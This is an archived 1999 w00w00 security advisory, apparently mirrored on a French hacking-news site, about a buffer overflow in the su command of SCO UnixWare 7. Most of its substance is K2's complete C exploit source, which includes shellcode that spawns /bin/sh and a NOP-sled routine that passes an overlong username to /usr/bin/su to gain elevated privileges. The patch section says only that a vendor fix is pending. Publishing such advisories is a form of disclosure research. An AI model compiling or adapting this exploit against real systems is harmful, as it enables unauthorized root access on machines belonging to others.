w00giving 99 -6- |
||||
|
w00w00 Security Development (WSD) http://www.w00w00.org/advisories.html ---------------------------------------------------------------------------- Sorry, we've been really tied up these past 2-3 weeks and have been unable to write up the advisories. We'll send three SCO advisories tonight to make up for it. We should have some interesting ones within the next two weeks (it's really hard to find the time to write up the exploits and advisories). You'll noticed we jumped from #3 to #5. w00giving advisory #4 has been available on http://www.w00w00.org/advisories.html for 2-3 weeks, but it wasn't posted to this list. w00w00.org has had hits from 55 different countries as of yesterday. If you are going to send out advisories, please cc them to news@technotronic.com, also. You can subscribe to it by sending "subscribe news" to majordomo@technotronic.com. Technotronic is a good site and beginning now, you will always see our advisories/articles/code posted on there first (order of release: w00w00.org, news@technotronic.com, news groups, bugtraq). ---------------------------------------------------------------------------- Discovered by: K2 (ktwo@ktwo.ca) The su command on SCO's UnixWare 7 has improper bounds checking on the username passed (via argv[1]), which can cause a buffer overflow when a lengthy username is passed. ---------------------------------------------------------------------------- Exploit (by K2): // UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999 #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> char shell[] = "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4" "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf" "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff" "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53" "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f" "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff"; const char x86_nop=0x90; long nop,esp; long offset=DEFOFF; char buffer[SIZE]; long get_esp() { __asm__("movl %esp,%eax"); } int main (int argc, char *argv[]) { register int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); else nop = NOPDEF; esp = get_esp(); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) *((int *) &buffer[i]) = esp+offset; printf("offset = [0x%x]\n",esp+offset); execl("/usr/bin/su", "su", buffer, NULL); printf("exec failed!\n"); return 0; } ---------------------------------------------------------------------------- Patch: SCO is in the process of fixing a list of vulnerabilities we sent a few weeks ago. ----------------------------------------------------------------------------
|
Page d'accueil Nous écrire By mail Nous envoyer des commentaires By la page de le Feed-Back |
Nouveautés
et... |
Le Sommaire de Kitetoa (orientation...) Sommaire général du site |
Les
rubriques! Les
livres publiés par Kitetoa |
Les
rubriques! (suite) Les Let-R-s Des Images On s'en fout! KitEcout' KessTaVu? -KiteToile Voyages |
Les dossiers : Precision [ZataZ] Le monde fou des Admins Defcon Le hack le plus bizarre Guerre de l'info Convention contre la cyber-criminalité Hack |
Questionnaire visant à améliorer le contenu de ce site si c'est possible et pas trop compliqué |
Rechercher sur le site ...et sur le Net Des liens et D'autres choses du Ouèb |